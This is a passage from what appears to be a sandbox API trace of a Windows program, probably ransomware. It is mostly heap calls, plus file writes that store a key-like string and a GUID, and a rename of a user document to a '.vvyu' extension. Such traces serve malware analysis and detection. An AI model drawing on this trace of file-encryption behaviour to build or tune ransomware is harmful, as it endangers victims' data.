(HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ad0 [0199.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b30 [0199.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0199.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b48 [0199.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ae8 [0199.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ab8 [0199.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade980 | out: hHeap=0x2c0000) returned 1 [0199.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0199.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.522] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0xa2eb, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0xa2eb, lpOverlapped=0x0) returned 1 [0199.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.523] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa2f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.524] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.525] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.525] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.525] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.526] CloseHandle (hObject=0x584) returned 1 [0199.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b9248 [0199.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0199.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9248 | out: hHeap=0x2c0000) returned 1 [0199.527] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\OQlL9b4yk.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\oqll9b4yk.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\OQlL9b4yk.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\oqll9b4yk.odp.vvyu")) returned 1 [0199.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.529] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381bd0 | out: hHeap=0x2c0000) returned 1 [0199.532] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc229efd0, ftCreationTime.dwHighDateTime=0x1d89c73, ftLastAccessTime.dwLowDateTime=0xb4db35b0, ftLastAccessTime.dwHighDateTime=0x1d89ed4, ftLastWriteTime.dwLowDateTime=0xb4db35b0, ftLastWriteTime.dwHighDateTime=0x1d89ed4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RAN3RZLWQzdFaTXUwx", cAlternateFileName="RAN3RZ~1")) returned 1 [0199.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0199.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0199.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edcf8 [0199.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8eb8 [0199.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b9248 [0199.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x37d010 [0199.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x2af7180 [0199.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa000 | out: hHeap=0x2c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29ade80 | out: hHeap=0x2c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0199.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29ade80 [0199.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0199.534] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc229efd0, ftCreationTime.dwHighDateTime=0x1d89c73, ftLastAccessTime.dwLowDateTime=0xb4db35b0, ftLastAccessTime.dwHighDateTime=0x1d89ed4, ftLastWriteTime.dwLowDateTime=0xb4db35b0, ftLastWriteTime.dwHighDateTime=0x1d89ed4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RAN3RZLWQzdFaTXUwx", cAlternateFileName="RAN3RZ~1")) returned 0 [0199.535] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0199.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0199.536] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0199.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0199.536] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0199.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 